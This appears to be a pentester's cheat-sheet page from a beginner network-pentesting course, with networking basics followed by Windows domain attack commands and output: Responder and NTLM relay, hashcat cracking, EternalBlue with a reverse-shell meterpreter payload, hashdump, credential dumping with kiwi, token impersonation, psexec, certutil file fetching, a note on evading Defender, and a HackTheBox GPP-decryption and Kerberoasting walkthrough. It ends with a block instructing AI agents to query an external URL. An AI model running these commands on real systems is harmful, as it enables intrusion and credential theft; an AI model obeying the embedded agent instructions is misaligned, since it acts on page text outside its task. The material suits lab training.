# Commands

```
ifconfig
iwconfig

# ping normally works indefinitely
$ ping -c 1 192.168.1.254
#         ^ ping with count of 1

$ arp -a
_gateway (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
#       -a     Use alternate BSD style output format (with no fixed columns).

$ netstat -ano
#   -a, --all
#       Show  both  listening  and  non-listening sockets.  With the --interfaces option,
#       show interfaces that are not up
#       
#   --numeric, -n
#       Show  numerical  addresses  instead of trying to determine symbolic host, port or
#       user names.
#
#   -o, --timers
#       Include information related to networking timers.

$ route # show / manipulate the IP routing table

# Print Router IP
$ ip route show | grep -i 'default via'| awk '{print $3 }'

$ tr -s ' ' <text.txt | cut -d ' ' -f4
# -s, --squeeze-repeats  replace each input sequence of a repeated character
#                        that is listed in SET1 with a single occurrence
#                        of that character

adduser
locate
updatedb - update a database for locate
chmod +x
su
apt-purge
eog - photo viewer

$ hash -r
# Before getting happy with apt-get removes and installs. It's worthwhile to reset your bash cache.
# https://stackoverflow.com/questions/16237490/i-screwed-up-the-system-version-of-python-pip-on-ubuntu-12-10

# Linux --VMs will take much longer
hashcat -m 5600 hash.txt /root/rockyou.txt #NetNTLMv2

# Windows
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt

python Responder.py -I eth0 -rdw

crackmapexec smb <ip range> -u Administrator -p 'P@$$word!' -d MARVEL

meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator

# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps

locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support


nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump

meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print

#check if machine is dual-homed. if two NICs, can pivot
# e.g. if on 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter

meterpreter > load incognito
meterpreter > list_tokens -u

meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list

root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # just pressed enter
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available


root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)

root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

root@kali:~/Security/HackTheBox/active# cd /opt/impacket/examples/
root@kali:/opt/impacket/examples# python GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password: # entered GPPstillStandingStrong2k18
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                  
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520 



$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$cfe6baaf6d9538cee9ab43897032e0fa$09198fe8a7f83682b4388efdc589cb1cda10227e9a60c7c35ea7d22c06d5a4bcda24ccaed5f93340a637fd28d7ccb66a72f389f5804de980f1994a7ff824ef17af26dd8c5c8a1c6d3455d0c7382b67d974316f7bf4b92f34a29f58a72b4379030b252d32db97ab5b11856163f11467818748522e3675dd450ba3aabbf50e48e1c4e30cbba5dc084f3d2c42046ce1a3479ec357f32dec622e2d53b0886dc80d9859cb884f5bde9ad9e04de3a5ea3fdf8ccbe85700be9d1482e6e8464432c72c3937d73a1d1a995e50551d7262f37449c04c646ebf4858ab7c9a2dc52cdcfad11dde4d1619edebee18b0720cd4d31a89183eee9ac7a271220ee5426150df7a13707dc6a87c8c9b5eb724b2c82d88b6bd291d32f2810f4739e2d2c85c5110438ccd638af22cf31cc3573f75c76bc3509e1ef8673850f1f6e5705d3eb562fce69bb0c14164ebada481efa673a48d03982b3e00aaec576abc5bbeb9f62aa10dbbe8db0457ad10a8dcd044ee16fe52f2982dc6b5209a6e21731183854f8f154202093a358c81aa374926a9bc4586511d2eb0cbb5e97a8128246b8c0fc25e10bb223caf955ef2d698c8b1b417e4586b5e023a223f977ec939a43e99506f582acca6310d465ec02562f76795bb9283e56cb3afc2eb6e6d035fedff593c385f0f55514499777141a01008b71b544bb94ea7bcbabb0576b4b668fd32ff7e83544d2ea00d9742ff25810d3b419afa77d132f4cc45cffe4c6ae87f0b39b0d8f4b9865745d731a70b1eeaf3dd5bae0003660e5eea6d9a905805080dd4918580a37245a50b8a5c2019c0134c727de350bcf4035efd6213e7ab3305023c725c4ec29299a04ef952564b2d380afb35a1f7f383fbe861068cfd5d45ce504991cb0084797505b5cd7ceb60f9901156964bea2c907c541d26dd379acec3ee27aa67d89dfdfa98c8833ccac102788ddbf9f01f29874b05f741f8a87ea5b7fd440da54e7c8f2938cb837ed800a917cff2ca69472a15227bf32e4ef0d95d20583d4bbf2f8650ade6ff94ba654a1e04c2ecfbd65e57e75e1f202b114effdad8d2c57cd30d5bc036749bcc55400cb4b18ccbd2529dd1c753f9da30cab6a87244d7b3217bad670e0417b4ad1c0eb1ca576ba963fdcb67adebe90df3697874ae19a990ce4b9a3e9ec0556cb74e0a4df654a583ea185c0dd1b41f175715a2f5b1ad2b60361885498f6645ba3f8a6309bf0085245092ef4edaa5fb6d67e6981045c657a0ce0f6104

# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.zacheller.dev/pentest/courses/beginner-network-pentesting/commands.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.